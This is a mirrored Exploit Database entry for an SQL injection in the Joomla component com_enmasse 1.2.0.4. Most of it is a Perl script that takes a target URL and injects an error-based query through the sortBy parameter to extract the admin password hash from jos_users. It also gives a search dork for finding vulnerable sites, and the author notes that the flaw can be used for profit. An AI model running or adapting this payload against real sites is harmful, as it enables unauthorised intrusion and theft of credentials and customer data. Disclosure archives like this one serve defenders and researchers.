Joomla! Component com_enmasse 1.2.0.4 – SQL Injection

• Exploit Database
• 13 阅读

• 作者： D4NB4R
  日期： 2012-08-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/20343/

•  
  
  # Exploit Title: Joomla com_enmasse Remote Exploit
  
   # Author: Daniel Barragan "D4NB4R"
  
  
  # Español
  
  # hola, este exploit afecta sitios de ecommerce por lo cual el exploit solo dara una muestra 
  # de la extraccion posible de datos, No me hago responsable del uso que se le de. ya que es 
  # posible obtener lucro economico por medio del mismo. El script esta hecho con tablas por 
  # defecto de joomla.
  
  # English
  
  # hi, this exploit affects ecommerce sites so the exploit only give a sample of the 
  # possible extraction of data, I am not responsible for any use that is given. since 
  # it is possible to obtain economic profit through this. the script is done with joomla default tables.
  
  
  
  #!/usr/bin/perl -w
  
  ########################################
  # Exploit Title: Joomla com_enmasse Remote Exploit
  #
  # Dork: inurl:index.php?option=com_enmasse
  #
  # Date: [06-08-2012]
  # 
  # Author: Daniel Barragan "D4NB4R"
  # 
  # Twitter: @D4NB4R
  # 
  # site: http://poisonsecurity.wordpress.com/
  # 
  # Vendor: http://www.matamko.com/
  # 
  # Version: 1.2.0.4 (last update on Jul 27, 2012)
  # 
  # License: Enmasse 6 Months Support & Subscription -USD$358.20
  #
  # Demo: http://www.matamko.com/products/filexpress/live-demo.html
  #
  # Tested on: [Linux(bt5)-Windows(7ultimate)]
  #
  # Gretz: r0073r, indoushka, Ksha, Devboot, pilotcast, shine, aku, navi, dedalo etc.... 
  ########################################
  
  print "\t\t\n\n";
  print "\t\n";
  print "\tDaniel BarraganD4NB4R\n";
  print "\t \n";
  print "\tJoomla com_enmasse Remote Exploit \n";
  print "\t\n\n";
  
  use LWP::UserAgent;
  print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";
  
  chomp(my $target=<STDIN>);
  
  $concatene="concat(password)";
  $table="jos_users";
  $d4nb4r="floor";
  $com="com_enmasse";
  $seleccione="select";
  
  
  $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
  $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
  
  $host = $target . "index.php?categoryId=1&controller=deal&keyword=1&locationId=1&option=".$com."&sortBy=117 and(".$seleccione." 1 from(".$seleccione." count(*),concat((".$seleccione." (".$seleccione." (".$seleccione." ".$concatene." from ".$table." Order by username limit 0,1) ) from `information_schema`.tables limit 0%2C1)%2C".$d4nb4r."(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1";
  
  $res = $b->request(HTTP::Request->new(GET=>$host));
  $answer = $res->content; if ($answer =~/([0-:a-fA-F]{32})/){
  
  print "\n Hash Admin : $1\n\n";
  print " El exploit fue exitoso si desea ver mas datos modifique el script\n";
  print " The exploit was successful if you want to see more data modify the script\n";
  
  }
  else{print "\n[-] No se pudo, intente manualmente\n";}
  
  #####Daniel Barragan D4NB4R 2012################